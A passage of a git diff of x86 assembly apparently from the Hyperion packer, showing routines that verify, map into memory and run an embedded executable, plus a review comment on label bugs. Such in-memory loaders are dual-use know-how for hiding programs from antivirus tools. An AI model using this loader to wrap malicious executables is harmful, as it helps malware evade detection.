-lidt_next_lookup_entry:
- mov eax,[lookup_table]
- add eax,ecx
- mov eax,[eax]
- test eax,eax
- jz lidt_exit_success
- mov ebx,eax
- and eax,IMAGE_ORDINAL_FLAG32
- jnz lidt_byordinal
-lidt_byname:
- createStringName str1
- lea eax,[str1]
- writeLog APITable, eax
- test eax,eax
- jz lidt_exit_error
- add ebx,[image_base]
- lea ebx,[ebx+IMAGE_IMPORT_BY_NAME.Name_]
- mov eax,ebx
- writeLog APITable, eax
- test eax,eax
- jz lidt_exit_error
- writeNewLineToLog APITable
- test eax,eax
- jz lidt_exit_error
- ;API name pointer in ebx
- push ecx
- invoke GetProcAddress, [dll_image_base], ebx
- pop ecx
- test eax,eax
- jz lidt_exit_error
- mov ebx,[import_address_table]
- add ebx,ecx
- mov [ebx],eax
- ;fetch next API
- add ecx,4
- jmp lidt_next_lookup_entry
-
-lidt_byordinal:
- createStringOrdinal str1
- lea eax,[str1]
- writeLog APITable, eax
- test eax,eax
- jz lidt_exit_error
- ;remove the ordinal flag
- xor ebx,IMAGE_ORDINAL_FLAG32
- mov eax,ebx
- writeRegisterToLog APITable, eax
- test eax,eax
- jz pit_exit_error
- ;API ordinal in ebx
- push ecx
- invoke GetProcAddress, [dll_image_base], ebx
- pop ecx
- test eax,eax
- jz lidt_exit_error
- mov ebx,[import_address_table]
- add ebx,ecx
- mov [ebx],eax
- ;fetch next API
- add ecx,4
- jmp lidt_next_lookup_entry
-
-lidt_exit_success:
- popad
- mov eax,1
- ret
-
-lidt_exit_error:
- popad
- mov eax,0
- ret
-endp;
-
-;sets the memory permissions for each section
-proc setPermissions stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
-file_image_size:DWORD
-
-local number_of_sections:DWORD, image_base:DWORD, section_headers:DWORD,\
-pe_header_size:DWORD, str1[256]:BYTE, vprotect_ret:DWORD
-
- pushad
- ;find section header
- mov edx,[image_file_header]
- sub eax,eax
- mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
- mov [number_of_sections],eax
- add edx,sizeof.IMAGE_FILE_HEADER
- mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
- mov [image_base],eax
- ;search for section header
- lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
- mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
- mov edx,sizeof.IMAGE_DATA_DIRECTORY
- mul edx
- add eax,ebx
- ;first section header found
- mov [section_headers],eax
- mov eax,sizeof.IMAGE_SECTION_HEADER
- mov edx,[number_of_sections]
- mul edx
- ;end of section header sections found
- add eax,[section_headers]
- mov ebx,[file_image_base]
- sub eax,ebx
- ;unaligned size of pe header in eax
- mov [pe_header_size],eax
-
- ;set pe header page read-only
- mov edx,[APITable]
- lea eax,[vprotect_ret]
- stdcall dword [edx+VirtualProtect], [image_base], [pe_header_size], PAGE_READONLY, eax
- test eax,eax
- jz sp_exit_error
-
- ;some output for the user
- writeRegisterToLog APITable, [image_base]
- test eax,eax
- jz sp_exit_error
-
- ;set the section page permissions
- mov ecx,[number_of_sections]
- mov ebx,[section_headers]
-sp_load_section_loop:
- stdcall setSection, [APITable], ebx, [image_base], [file_image_base]
- test eax,eax
- jz sp_exit_error
- add ebx,sizeof.IMAGE_SECTION_HEADER
- dec ecx
- jnz sp_load_section_loop
-
-sp_exit_success:
- popad
- mov eax,1
- ret
-
-sp_exit_error:
- popad
- sub eax,eax
- ret
-endp;
-
-;sets the complete image of the decrypted file writeable so
-;we can copy pe header and sections into into
-proc loadFile stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
-file_image_size:DWORD
-
-local number_of_sections:DWORD, image_base:DWORD, aux:DWORD,\
-str1[256]:BYTE, vprotect_ret:DWORD, section_headers:DWORD, pe_header_size:DWORD
-
- pushad
- ;find section header
- mov edx,[image_file_header]
- sub eax,eax
- mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
- mov [number_of_sections],eax
- add edx,sizeof.IMAGE_FILE_HEADER
- mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
- mov [image_base],eax
- ;make the complete image writable
- mov eax,[edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
- mov [aux],edx ;store edx, we need it later
- lea edx,[vprotect_ret]
- mov ebx,[APITable]
- stdcall dword [ebx+VirtualProtect], [image_base], eax, PAGE_READWRITE, edx
- test eax,eax
- jz lf_exit_error
-
- ;some output for the user
- writeWithNewLine createStringLoadedPEHeader, str1, lf_exit_error
- writeRegisterToLog APITable, [image_base]
- test eax,eax
- jz lf_exit_error
-
- mov edx,[aux] ;restore edx
- ;continue search for section header
- lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
- mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
- mov edx,sizeof.IMAGE_DATA_DIRECTORY
- mul edx
- add eax,ebx
-
- ;first section header found
- mov [section_headers],eax
- mov eax,sizeof.IMAGE_SECTION_HEADER
- mov edx,[number_of_sections]
- mul edx
- ;end of section header sections found
- add eax,[section_headers]
- mov ebx,[file_image_base]
- sub eax,ebx
- ;unaligned size of pe header in eax
- mov [pe_header_size],eax
-
- ;copy header to memory
- mov edi,[image_base]
- mov esi,[file_image_base]
- mov ecx,[pe_header_size]
- rep movsb
-
- ;load the sections
- mov ecx,[number_of_sections]
- mov ebx,[section_headers]
-lf_load_section_loop:
- stdcall loadSection, [APITable], ebx, [image_base], [file_image_base]
- test eax,eax
- jz lf_exit_error
- add ebx,sizeof.IMAGE_SECTION_HEADER
- dec ecx
- jnz lf_load_section_loop
-
-lf_exit_success:
- popad
- mov eax,[image_base]
- ret
-
-lf_exit_error:
- popad
- mov eax,0
- ret
-
-endp
-
-;load the corresponding section into memory
-proc loadSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
-file_image_base:DWORD
-
-local str1[256]:BYTE
-
- pushad
- ;copy from file into memory
- mov edx,[section_header]
- mov edi,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
- add edi,[image_base]
- mov esi,[file_image_base]
- add esi,[edx+IMAGE_SECTION_HEADER.PointerToRawData]
- mov ecx,[edx+IMAGE_SECTION_HEADER.SizeOfRawData]
- rep movsb
-
- ;print some infos to the log file
- createStringLoaded str1
- lea eax,[str1]
- writeLog APITable, eax
- test eax,eax
- jz ls_exit_error
- lea edi,[str1]
- mov byte [edi+8],0
- mov edx,[section_header]
- lea esi,[edx+IMAGE_SECTION_HEADER._Name]
- mov ecx,8
- push edi
- rep movsb
- pop edi
- writeLog APITable, edi
- writeNewLineToLog APITable
- mov edx,[section_header]
- mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
- add eax,[image_base]
- writeRegisterToLog APITable, eax
-
-ls_exit_success:
- popad
- mov eax,1
- ret
-
-ls_exit_error:
- popad
- sub eax,eax
- ret
-
-endp
-
-;set the memory page permission for the corresponding section
-proc setSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
-file_image_base:DWORD
-
-local section_flags:DWORD, vprotect_ret:DWORD, str1[256]:BYTE
-
- pushad
- mov edx,[section_header]
-;section execute/read/write?
- mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
- and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
- cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
- jne ssn_no_execute_read_write
- mov eax,PAGE_EXECUTE_READWRITE
- mov [section_flags],eax
- jmp ssn_set_memory
-ssn_no_execute_read_write:
- ;section execute/read?
- mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
- and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
- cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
- jne ssn_no_execute_read
- mov eax,PAGE_EXECUTE_READ
- mov [section_flags],eax
- jmp ssn_set_memory
-ssn_no_execute_read:
- ;section read/write?
- mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
- and ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
- cmp ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
- jne ssn_no_read_write
- mov eax,PAGE_READWRITE
- mov [section_flags],eax
- jmp ssn_set_memory
-ssn_no_read_write:
- ;section read?
- mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
- and ebx,IMAGE_SCN_MEM_READ
- cmp ebx,IMAGE_SCN_MEM_READ
- jne ssn_no_read
- mov eax,PAGE_READONLY
- mov [section_flags],eax
- jmp ssn_set_memory
-ssn_no_read:
- mov eax,PAGE_NOACCESS
- mov [section_flags],eax
-
- ;set section permissions
-ssn_set_memory:
- mov edx,[section_header]
- mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
- add eax,[image_base]
- mov ebx,[edx+IMAGE_SECTION_HEADER.VirtualSize]
- mov ecx,[APITable]
- lea edx,[vprotect_ret]
- stdcall dword [ecx+VirtualProtect],eax,ebx,[section_flags], edx
- test eax,eax
- jz ssn_exit_error
-
- ;some output for the user
- mov edx,[section_header]
- mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
- add eax,[image_base]
- writeRegisterToLog APITable, eax
-
-ssn_exit_success:
- popad
- mov eax,1
- ret
-
-ssn_exit_error:
- popad
- sub eax,eax
- ret
-endp;
-
-;check MZ und PE signature and return start of the image file header
-proc verifyPE stdcall, image_base:DWORD, section_size:DWORD
-
-local retval:DWORD
-
- pushad
- mov edx,[image_base]
- mov ax,[edx+IMAGE_DOS_HEADER.e_magic]
- cmp ax,IMAGE_DOS_SIGNATURE
- jne vpe_exit_error
- mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
- add edx,eax
- mov eax,dword [edx]
- cmp eax,IMAGE_NT_SIGNATURE
- jne vpe_exit_error
- add edx,4
- mov [retval],edx
-
-vpe_exit_success:
- popad
- mov eax,[retval]
- ret
-
-vpe_exit_error:
- popad
- sub eax,eax
- ret
-
-endp
-
-;First 4 bytes of data seciton contain a checksum
-;Verify that the checksum is correct
-;TODO: CHECKSUM SIZE is atm hardcoded
-proc verifyChecksum stdcall, section_address:DWORD, section_size:DWORD
-
- pushad
- mov ebx,dword [section_address]
- mov eax,[ebx]
- add ebx,4
- mov ecx,[section_size]
- sub ecx,4
- ;checksum is in eax
- ;pointer to file in ebx
- ;size of file in ecx
- sub edi,edi
-vs_calc_cs:
- sub edx,edx
- mov dl,byte [ebx]
- add edi,edx
- inc ebx
- dec ecx
- jnz vs_calc_cs
- ;calculated checksum is in edi
- cmp edi,eax
- jne vs_exit_error
-
-vs_exit_success:
- popad
- mov eax,1
- ret
-
-vs_exit_error:
- popad
- sub eax,eax
- ret
-
+;Loads the exe which is stored in input_image
+;into memory and starts its execution
+proc loadExecutable stdcall APITable:DWORD,\
+input_image:DWORD
+
+local str1[256]:BYTE, ret_val:DWORD, image_file_header:DWORD,\
+loaded_file:DWORD
+
+ pushad
+ ;verify checksum of packed executable
+ writeWithNewLine createStringVerifyChecksum, str1, le_exit_error
+ stdcall verifyChecksum, [input_image], INFILE_SIZE
+ test eax,eax
+ jz le_exit_error
+
+ ;verify whether the content of the data section is pe
+ writeWithNewLine createStringVerifyPE, str1, le_exit_error
+ mov eax,[input_image]
+ add eax,4
+ stdcall verifyPE, eax, INFILE_SIZE
+ test eax,eax
+ mov [image_file_header],eax
+ jz le_exit_error
+
+ ;copy pe header and sections into memory
+ writeNewLineToLog APITable
+ writeWithNewLine createStringMappingFileInMemory, str1, le_exit_error
+ mov eax,[input_image]
+ add eax,4
+ mov ebx,INFILE_SIZE
+ sub ebx,4
+ stdcall loadFile, [APITable], [image_file_header], eax, ebx
+ test eax,eax
+ mov [loaded_file],eax
+ jz le_exit_error
+
+ ;loading import table
+ writeNewLineToLog APITable
+ writeWithNewLine createStringLoadingFilesAPIs, str1, le_exit_error
+ stdcall loadImportTable, [APITable], [loaded_file]
+ test eax,eax
+ jz le_exit_error
+
+ ;set the correct permissions for each section
+ writeNewLineToLog APITable
+ writeWithNewLine createStringSettingPermissions, str1, le_exit_error
+ mov eax,[input_image]
+ add eax,4
+ mov ebx,INFILE_SIZE
+ sub ebx,4
+ stdcall setPermissions, [APITable], [image_file_header], eax, ebx
+ test eax,eax
+ jz le_exit_error
+
+le_exit_success:
+ popad
+ mov eax,1
+ ret
+
+le_exit_error:
+ popad
+ mov eax,0
+ ret
+
+endp
+
+;load the APIs in the import table
+proc loadImportTable, APITable:DWORD, image_base:DWORD
+
+local str1[256]:BYTE, import_table:DWORD, null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE
+
+ pushad
+ ;find import table in data directory
+ mov edx,[image_base]
+ mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
+ add eax,edx
+ add eax,4
+ ;image file header now in eax
+ add eax,sizeof.IMAGE_FILE_HEADER
+ lea eax,[eax+IMAGE_OPTIONAL_HEADER32.DataDirectory]
+ ;first data directory entry now in eax
+ add eax,sizeof.IMAGE_DATA_DIRECTORY
+ ;import data directory entry now in eax
+ mov eax,[eax+IMAGE_DATA_DIRECTORY.VirtualAddress]
+ add eax,edx
+ ;pointer to import table now in eax
+ mov [import_table],eax
+ writeWithNewLine createStringFoundImportTable, str1, le_exit_error
+ writeRegisterToLog APITable, [import_table]
+ test eax,eax
+ jz pit_exit_error
+
+ ;init null directory entry
+ lea esi,[null_directory_entry]
+ mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+ mov al,0
+pit_init_null_directory_loop:
+ mov [esi],al
+ inc esi
+ dec ecx
+ jnz pit_init_null_directory_loop
+
+ mov ebx,[import_table]
+ ;iterate over the directory tables
+pit_next_directory_entry:
+ lea esi,[null_directory_entry]
+ mov edi,ebx
+ mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+ rep cmpsb
+ je pit_exit_success
+ ;load APIs of this directory
+ stdcall loadImportDirectoryTable, [APITable], [image_base], ebx
+ test eax,eax
+ jz pit_exit_error
+ ;next entry
+ add ebx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+ jmp pit_next_directory_entry
+
+pit_exit_success:
+ popad
+ mov eax,1
+ ret
+
+pit_exit_error:
+ popad
+ mov eax,0
+ ret
+endp
+
+;loads the APIs
+proc loadImportDirectoryTable stdcall, APITable:DWORD, image_base:DWORD, directory_entry:DWORD
+
+local str1[256]:BYTE, lookup_table:DWORD, import_address_table:DWORD, dll_image_base:DWORD
+
+ pushad
+ ;write info about data directory table to logfile
+ writeNewLineToLog APITable
+ test eax,eax
+ jz lidt_exit_error
+ writeWithNewLine createStringProcessImportDirectory, str1, lidt_exit_error
+ mov eax,[directory_entry]
+ mov eax,[eax+IMAGE_IMPORT_DESCRIPTOR.Name_]
+ add eax,[image_base]
+ mov ebx,eax
+ ;pointer to dll name in ebx
+ writeLog APITable, eax
+ test eax,eax
+ jz lidt_exit_error
+ writeNewLineToLog APITable
+ test eax,eax
+ jz lidt_exit_error
+
+ ;load the corresponding dll
+ invoke LoadLibrary, ebx
+ test eax,eax
+ jz lidt_exit_error
+ mov [dll_image_base],eax
+
+ ;read pointer to the api tables
+ mov edx,[directory_entry]
+ mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
+ add eax,[image_base]
+ mov [lookup_table],eax
+ mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
+ add eax,[image_base]
+ mov [import_address_table],eax
+
+ ;index to current API
+ sub ecx,ecx
+ ;iterate the lookup_table entries
+lidt_next_lookup_entry:
+ mov eax,[lookup_table]
+ add eax,ecx
+ mov eax,[eax]
+ test eax,eax
+ jz lidt_exit_success
+ mov ebx,eax
+ and eax,IMAGE_ORDINAL_FLAG32
+ jnz lidt_byordinal
+lidt_byname:
+ createStringName str1
+ lea eax,[str1]
+ writeLog APITable, eax
+ test eax,eax
+ jz lidt_exit_error
+ add ebx,[image_base]
+ lea ebx,[ebx+IMAGE_IMPORT_BY_NAME.Name_]
+ mov eax,ebx
+ writeLog APITable, eax
+ test eax,eax
+ jz lidt_exit_error
+ writeNewLineToLog APITable
+ test eax,eax
+ jz lidt_exit_error
+ ;API name pointer in ebx
+ push ecx
+ invoke GetProcAddress, [dll_image_base], ebx
+ pop ecx
+ test eax,eax
+ jz lidt_exit_error
+ mov ebx,[import_address_table]
+ add ebx,ecx
+ mov [ebx],eax
+ ;fetch next API
+ add ecx,4
+ jmp lidt_next_lookup_entry
+
+lidt_byordinal:
+ createStringOrdinal str1
+ lea eax,[str1]
+ writeLog APITable, eax
+ test eax,eax
+ jz lidt_exit_error
+ ;remove the ordinal flag
+ xor ebx,IMAGE_ORDINAL_FLAG32
+ mov eax,ebx
+ writeRegisterToLog APITable, eax
+ test eax,eax
+ jz pit_exit_error
+ ;API ordinal in ebx
+ push ecx
+ invoke GetProcAddress, [dll_image_base], ebx
+ pop ecx
+ test eax,eax
+ jz lidt_exit_error
+ mov ebx,[import_address_table]
+ add ebx,ecx
+ mov [ebx],eax
+ ;fetch next API
+ add ecx,4
+ jmp lidt_next_lookup_entry
+
+lidt_exit_success:
+ popad
+ mov eax,1
+ ret
+
+lidt_exit_error:
+ popad
+ mov eax,0
+ ret
+endp;
+
+;sets the memory permissions for each section
+proc setPermissions stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
+file_image_size:DWORD
+
+local number_of_sections:DWORD, image_base:DWORD, section_headers:DWORD,\
+pe_header_size:DWORD, str1[256]:BYTE, vprotect_ret:DWORD
+
+ pushad
+ ;find section header
+ mov edx,[image_file_header]
+ sub eax,eax
+ mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
+ mov [number_of_sections],eax
+ add edx,sizeof.IMAGE_FILE_HEADER
+ mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
+ mov [image_base],eax
+ ;search for section header
+ lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
+ mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
+ mov edx,sizeof.IMAGE_DATA_DIRECTORY
+ mul edx
+ add eax,ebx
+ ;first section header found
+ mov [section_headers],eax
+ mov eax,sizeof.IMAGE_SECTION_HEADER
+ mov edx,[number_of_sections]
+ mul edx
+ ;end of section header sections found
+ add eax,[section_headers]
+ mov ebx,[file_image_base]
+ sub eax,ebx
+ ;unaligned size of pe header in eax
+ mov [pe_header_size],eax
+
+ ;set pe header page read-only
+ mov edx,[APITable]
+ lea eax,[vprotect_ret]
+ stdcall dword [edx+VirtualProtect], [image_base], [pe_header_size], PAGE_READONLY, eax
+ test eax,eax
+ jz sp_exit_error
+
+ ;some output for the user
+ writeRegisterToLog APITable, [image_base]
+ test eax,eax
+ jz sp_exit_error
+
+ ;set the section page permissions
+ mov ecx,[number_of_sections]
+ mov ebx,[section_headers]
+sp_load_section_loop:
+ stdcall setSection, [APITable], ebx, [image_base], [file_image_base]
+ test eax,eax
+ jz sp_exit_error
+ add ebx,sizeof.IMAGE_SECTION_HEADER
+ dec ecx
+ jnz sp_load_section_loop
+
+sp_exit_success:
+ popad
+ mov eax,1
+ ret
+
+sp_exit_error:
+ popad
+ sub eax,eax
+ ret
+endp;
+
+;sets the complete image of the decrypted file writeable so
+;we can copy pe header and sections into into
+proc loadFile stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
+file_image_size:DWORD
+
+local number_of_sections:DWORD, image_base:DWORD, aux:DWORD,\
+str1[256]:BYTE, vprotect_ret:DWORD, section_headers:DWORD, pe_header_size:DWORD
+
+ pushad
+ ;find section header
+ mov edx,[image_file_header]
+ sub eax,eax
+ mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
+ mov [number_of_sections],eax
+ add edx,sizeof.IMAGE_FILE_HEADER
+ mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
+ mov [image_base],eax
+ ;make the complete image writable
+ mov eax,[edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
+ mov [aux],edx ;store edx, we need it later
+ lea edx,[vprotect_ret]
+ mov ebx,[APITable]
+ stdcall dword [ebx+VirtualProtect], [image_base], eax, PAGE_READWRITE, edx
+ test eax,eax
+ jz lf_exit_error
+
+ ;some output for the user
+ writeWithNewLine createStringLoadedPEHeader, str1, lf_exit_error
+ writeRegisterToLog APITable, [image_base]
+ test eax,eax
+ jz lf_exit_error
+
+ mov edx,[aux] ;restore edx
+ ;continue search for section header
+ lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
+ mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
+ mov edx,sizeof.IMAGE_DATA_DIRECTORY
+ mul edx
+ add eax,ebx
+
+ ;first section header found
+ mov [section_headers],eax
+ mov eax,sizeof.IMAGE_SECTION_HEADER
+ mov edx,[number_of_sections]
+ mul edx
+ ;end of section header sections found
+ add eax,[section_headers]
+ mov ebx,[file_image_base]
+ sub eax,ebx
+ ;unaligned size of pe header in eax
+ mov [pe_header_size],eax
+
+ ;copy header to memory
+ mov edi,[image_base]
+ mov esi,[file_image_base]
+ mov ecx,[pe_header_size]
+ rep movsb
+
+ ;load the sections
+ mov ecx,[number_of_sections]
+ mov ebx,[section_headers]
+lf_load_section_loop:
+ stdcall loadSection, [APITable], ebx, [image_base], [file_image_base]
+ test eax,eax
+ jz lf_exit_error
+ add ebx,sizeof.IMAGE_SECTION_HEADER
+ dec ecx
+ jnz lf_load_section_loop
+
+lf_exit_success:
+ popad
+ mov eax,[image_base]
+ ret
+
+lf_exit_error:
+ popad
+ mov eax,0
+ ret
+
+endp
+
+;load the corresponding section into memory
+proc loadSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
+file_image_base:DWORD
+
+local str1[256]:BYTE
+
+ pushad
+ ;copy from file into memory
+ mov edx,[section_header]
+ mov edi,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add edi,[image_base]
+ mov esi,[file_image_base]
+ add esi,[edx+IMAGE_SECTION_HEADER.PointerToRawData]
+ mov ecx,[edx+IMAGE_SECTION_HEADER.SizeOfRawData]
+ rep movsb
+
+ ;print some infos to the log file
+ createStringLoaded str1
+ lea eax,[str1]
+ writeLog APITable, eax
+ test eax,eax
+ jz ls_exit_error
+ lea edi,[str1]
+ mov byte [edi+8],0
+ mov edx,[section_header]
+ lea esi,[edx+IMAGE_SECTION_HEADER._Name]
+ mov ecx,8
+ push edi
+ rep movsb
+ pop edi
+ writeLog APITable, edi
+ writeNewLineToLog APITable
+ mov edx,[section_header]
+ mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add eax,[image_base]
+ writeRegisterToLog APITable, eax
+
+ls_exit_success:
+ popad
+ mov eax,1
+ ret
+
+ls_exit_error:
+ popad
+ sub eax,eax
+ ret
+
+endp
+
+;set the memory page permission for the corresponding section
+proc setSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
+file_image_base:DWORD
+
+local section_flags:DWORD, vprotect_ret:DWORD, str1[256]:BYTE
+
+ pushad
+ mov edx,[section_header]
+;section execute/read/write?
+ mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+ and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ jne ssn_no_execute_read_write
+ mov eax,PAGE_EXECUTE_READWRITE
+ mov [section_flags],eax
+ jmp ssn_set_memory
+ssn_no_execute_read_write:
+ ;section execute/read?
+ mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+ and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+ cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+ jne ssn_no_execute_read
+ mov eax,PAGE_EXECUTE_READ
+ mov [section_flags],eax
+ jmp ssn_set_memory
+ssn_no_execute_read:
+ ;section read/write?
+ mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+ and ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ cmp ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ jne ssn_no_read_write
+ mov eax,PAGE_READWRITE
+ mov [section_flags],eax
+ jmp ssn_set_memory
+ssn_no_read_write:
+ ;section read?
+ mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+ and ebx,IMAGE_SCN_MEM_READ
+ cmp ebx,IMAGE_SCN_MEM_READ
+ jne ssn_no_read
+ mov eax,PAGE_READONLY
+ mov [section_flags],eax
+ jmp ssn_set_memory
+ssn_no_read:
+ mov eax,PAGE_NOACCESS
+ mov [section_flags],eax
+
+ ;set section permissions
+ssn_set_memory:
+ mov edx,[section_header]
+ mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add eax,[image_base]
+ mov ebx,[edx+IMAGE_SECTION_HEADER.VirtualSize]
+ mov ecx,[APITable]
+ lea edx,[vprotect_ret]
+ stdcall dword [ecx+VirtualProtect],eax,ebx,[section_flags], edx
+ test eax,eax
+ jz ssn_exit_error
+
+ ;some output for the user
+ mov edx,[section_header]
+ mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add eax,[image_base]
+ writeRegisterToLog APITable, eax
+
+ssn_exit_success:
+ popad
+ mov eax,1
+ ret
+
+ssn_exit_error:
+ popad
+ sub eax,eax
+ ret
+endp;
+
+;check MZ und PE signature and return start of the image file header
+proc verifyPE stdcall, image_base:DWORD, section_size:DWORD
+
+local retval:DWORD
+
+ pushad
+ mov edx,[image_base]
+ mov ax,[edx+IMAGE_DOS_HEADER.e_magic]
+ cmp ax,IMAGE_DOS_SIGNATURE
+ jne vpe_exit_error
+ mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
+ add edx,eax
+ mov eax,dword [edx]
+ cmp eax,IMAGE_NT_SIGNATURE
+ jne vpe_exit_error
+ add edx,4
+ mov [retval],edx
+
+vpe_exit_success:
+ popad
+ mov eax,[retval]
+ ret
+
+vpe_exit_error:
+ popad
+ sub eax,eax
+ ret
+
+endp
+
+;First 4 bytes of data seciton contain a checksum
+;Verify that the checksum is correct
+;TODO: CHECKSUM SIZE is atm hardcoded
+proc verifyChecksum stdcall, section_address:DWORD, section_size:DWORD
+
+ pushad
+ mov ebx,dword [section_address]
+ mov eax,[ebx]
+ add ebx,4
+ mov ecx,[section_size]
+ sub ecx,4
+ ;checksum is in eax
+ ;pointer to file in ebx
+ ;size of file in ecx
+ sub edi,edi
+vs_calc_cs:
+ sub edx,edx
+ mov dl,byte [ebx]
+ add edi,edx
+ inc ebx
+ dec ecx
+ jnz vs_calc_cs
+ ;calculated checksum is in edi
+ cmp edi,eax
+ jne vs_exit_error
+
+vs_exit_success:
+ popad
+ mov eax,1
+ ret
+
+vs_exit_error:
+ popad
+ sub eax,eax
+ ret
+
 endp
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/FasmContainer32/logfile_disable.asm b/binary/hyperion/source/Src/Container/32/logfile_disable.asm
similarity index 95%
rename from binary/hyperion/source/Src/FasmContainer32/logfile_disable.asm
rename to binary/hyperion/source/Src/Container/32/logfile_disable.asm
index 277c91c..de2ead3 100644
--- a/binary/hyperion/source/Src/FasmContainer32/logfile_disable.asm
+++ b/binary/hyperion/source/Src/Container/32/logfile_disable.asm
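Review bot: In loadImportDirectoryTable the by-ordinal branch exits with `jz pit_exit_error` right after writeRegisterToLog, which is loadImportTable's error label rather than this procedure's; FASM proc labels without a leading dot are global, so this assembles, but a failed log write there would run the wrong procedure's popad/ret epilogue against this procedure's frame. The line should read `jz lidt_exit_error`. The same cross-procedure slip appears in loadImportTable, whose `writeWithNewLine createStringFoundImportTable, str1, le_exit_error` names loadExecutable's exit label and should pass `pit_exit_error`. Both lines are carried over verbatim from the old side, so the rename did not introduce them, but the new path is the one that will be maintained. Separately, verifyPE receives section_size and never uses it: a bounds check on e_lfanew against it before reading the PE signature would make the header parse robust against a truncated or garbled payload.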
@@ -1,25 +1,25 @@
-;writes a string and a newline to the logfile
-macro writeWithNewLine char_sequence, char_buffer, error_exit{
- char_sequence char_buffer
- mov eax,1
-}
-
-;write a string to the logfile
-macro writeLog apitable, content{
- mov eax,1
-}
-
-;delete old log file and create a new one
-macro initLogFile apitable{
- mov eax,1
-}
-
-;write a newline into logfile
-macro writeNewLineToLog apitable{
- mov eax,1
-}
-
-;write a register value into logile
-macro writeRegisterToLog apitable, value{
- mov eax,1
+;writes a string and a newline to the logfile
+macro writeWithNewLine char_sequence, char_buffer, error_exit{
+ char_sequence char_buffer
+ mov eax,1
+}
+
+;write a string to the logfile
+macro writeLog apitable, content{
+ mov eax,1
+}
+
+;delete old log file and create a new one
+macro initLogFile apitable{
+ mov eax,1
+}
+
+;write a newline into logfile
+macro writeNewLineToLog apitable{
+ mov eax,1
+}
+
+;write a register value into logile
+macro writeRegisterToLog apitable, value{
+ mov eax,1
 }
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/FasmContainer32/logfile_enable.asm b/binary/hyperion/source/Src/Container/32/logfile_enable.asm
similarity index 95%
rename from binary/hyperion/source/Src/FasmContainer32/logfile_enable.asm
rename to binary/hyperion/source/Src/Container/32/logfile_enable.asm
index 993c16f..b2946f2 100644
--- a/binary/hyperion/source/Src/FasmContainer32/logfile_enable.asm
